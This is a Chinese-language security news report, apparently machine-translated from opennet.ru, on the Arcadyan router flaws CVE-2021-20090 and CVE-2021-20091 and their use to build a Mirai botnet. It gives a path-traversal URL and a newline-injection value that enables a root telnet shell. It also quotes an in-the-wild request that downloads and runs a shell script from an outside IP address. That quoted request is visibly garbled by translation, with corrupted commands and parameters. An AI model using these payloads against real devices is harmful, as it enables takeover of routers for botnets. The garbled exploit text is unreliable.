网络上记录了针对家庭路由器的大规模攻击,这些路由器的固件使用 Arcadyan 公司的 HTTP 服务器实现。 为了获得对设备的控制权,结合使用了两个漏洞,允许使用 root 权限远程执行任意代码。 该问题影响了 Arcadyan、ASUS 和 Buffalo 的相当广泛的 ADSL 路由器,以及 Beeline 品牌(该问题在 Smart Box Flash 中得到确认)、德国电信、Orange、O2、Telus、Verizon、Vodafone 和其他电信运营商。 值得注意的是,该问题在 Arcadyan 固件中已存在 10 多年,在此期间已成功迁移到来自 20 个不同制造商的至少 17 个设备型号。
第一个漏洞 CVE-2021-20090 使得无需身份验证即可访问任何 Web 界面脚本。 该漏洞的本质是在Web界面中,某些发送图像、CSS文件和JavaScript脚本的目录无需身份验证即可访问。 在这种情况下,将使用初始掩码检查允许无需身份验证即可访问的目录。 固件会阻止在路径中指定“../”字符前往父目录,但会跳过使用“..%2f”组合。 因此,当发送“http://192.168.1.1/images/..%2findex.htm”等请求时,可以打开受保护的页面。
第二个漏洞 CVE-2021-20091 允许经过身份验证的用户通过向 apply_abstract.cgi 脚本发送特殊格式的参数来更改设备的系统设置,该脚本不会检查参数中是否存在换行符。 例如,在执行 ping 操作时,攻击者可以在创建设置文件 /tmp/etc/config/ 时在检查 IP 地址的字段和脚本中指定值“192.168.1.2%0AARC_SYS_TelnetdEnable=1” .glbcfg,会将行“AARC_SYS_TelnetdEnable=1”写入其中“,这将激活 telnetd 服务器,该服务器提供具有 root 权限的不受限制的命令 shell 访问。 同样,通过设置AARC_SYS参数,您可以执行系统上的任何代码。 第一个漏洞使得可以通过以“/images/..%2fapply_abstract.cgi”访问脚本来运行有问题的脚本,而无需进行身份验证。
要利用漏洞,攻击者必须能够向运行 Web 界面的网络端口发送请求。 从攻击传播的动态来看,许多运营商保留了外部网络对其设备的访问权限,以简化支持服务对问题的诊断。 如果对接口的访问仅限于内部网络,则可以使用“DNS重新绑定”技术从外部网络进行攻击。 漏洞已被积极用于将路由器连接到 Mirai 僵尸网络:POST /images/..%2fapply_abstract.cgi HTTP/1.1 连接:关闭用户代理:Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7。 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; 卷曲+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
来源: opennet.ru